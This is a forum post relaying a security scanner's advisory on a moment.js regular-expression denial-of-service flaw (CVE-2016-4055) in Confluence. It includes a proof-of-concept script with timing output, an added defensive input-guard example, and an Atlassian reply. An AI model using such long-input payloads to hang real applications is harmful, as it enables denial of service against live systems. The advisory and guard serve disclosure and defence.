Confluence Security Weakness Sonatype CWE: 400

Hi,

Our security team performed a security scan on Confluence 6.21 and found a security issue, and the details are provided below. We could only adopt it for production use if that risk is addressed by Atlassian. Our procurement department is waiting for us to obtain a mitigating solution for this issue before they procure Confluence.

 

Severity Sonatype CVSS 3.0: 7.5

Weakness Sonatype CWE: 400

Explanation The moment package is vulnerable to a Regular Expression Denial of Service (ReDoS). The moment.duration() method in moment.js contains a regular expression, used to determine if an input is of the ASP.NET date format, that can cause an application to hang. The aspNetRegex, the variable's name in the code, causes very slow processing of exponentially long repetitive sequences leading to a Denial of Service (DoS) due to excessive resource consumption. A remote attacker could exploit this flaw by supplying a specially crafted request URL containing long repetitive sequences to cause the denial of service (DoS).

Proof of concept:

var moment = require('moment');

// Build a string of len + 1 copies of chr.
// Note: `i` is an implicit global here, shared with the loop below.
var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }
    return result;
}

// Time moment.duration() on progressively longer digit strings.
for (i=20000;i<=10000000;i=i+10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1')
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str)
    var end = process.hrtime(start);
    console.log(end);
}

Results

$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]

Reference Link: https://nodesecurity.io/advisories/55

Note: CVE-2016-4055 has been assigned to this vulnerability.

Detection The application is vulnerable by using this package.

Recommendation We recommend upgrading to a version of this component that is not vulnerable to this specific issue.

Categories Data

Root Cause moment : 2.5.0

Advisories Project: https://nodesecurity.io/advisories/55  
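
As an added example (not part of the original post, and not Atlassian's or moment's code): a call-site guard that caps length and pre-validates untrusted duration strings with an anchored, bounded pattern before they reach a parser such as `moment.duration()`, for use until the upgraded component is in place. `guardDurationInput`, `MAX_LEN` and both regular expressions are hypothetical and constructed for illustration; it assumes callers only need the ASP.NET-style time-span string form.

```javascript
'use strict';
// Added example; guardDurationInput, MAX_LEN and both patterns are hypothetical.
// Assumption: untrusted callers only send "[-][d.]hh:mm[:ss[.fff]]" strings.
const MAX_LEN = 32; // constructed limit, far above any legitimate time span

// Anchored at both ends with bounded quantifiers, so a non-matching input is
// rejected in one pass instead of being retried from every offset.
const STRICT_TIMESPAN =
  /^(-)?(?:(\d{1,8})\.)?(\d{1,2}):(\d{1,2})(?::(\d{1,2})(?:\.(\d{1,3}))?)?$/;

// Illustrative only, not copied from moment: an unanchored pattern whose
// greedy digit runs must be followed by ':' (the shape the advisory describes).
const LOOSE_TIMESPAN = /(-)?(?:(\d*)\.)?(\d+):(\d+)/;

// Returns { ok: true, value } or { ok: false, reason }; call the duration
// parser only on an ok result.
function guardDurationInput(input) {
  if (typeof input !== 'string') return { ok: false, reason: 'not-a-string' };
  if (input.length > MAX_LEN) return { ok: false, reason: 'too-long' };
  if (!STRICT_TIMESPAN.test(input)) return { ok: false, reason: 'bad-format' };
  return { ok: true, value: input };
}

// Wall-clock time of fn() in milliseconds.
function timeMs(fn) {
  const t0 = process.hrtime.bigint();
  fn();
  return Number(process.hrtime.bigint() - t0) / 1e6;
}

function demo() {
  const longDigits = '-' + '1'.repeat(10000); // constructed, same shape as the PoC input
  const loose = timeMs(() => LOOSE_TIMESPAN.test(longDigits));
  const guarded = timeMs(() => guardDurationInput(longDigits));
  console.log(`loose pattern: ${loose.toFixed(1)} ms, guard: ${guarded.toFixed(3)} ms`);
  console.log(guardDurationInput('1.02:03:04.005')); // accepted
  console.log(guardDurationInput('-1111111111'));    // short but malformed
}
demo();
```

The length check runs first so that over-long input never reaches any regular expression at all; the strict pattern then rejects short malformed strings.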

1 answer

0 vote
Ann Worley Atlassian Team Aug 21, 2017

Our security team has asked me to direct you to How to Report a Security Issue.

It would be great if you could follow up on this forum to let the Community know the result.
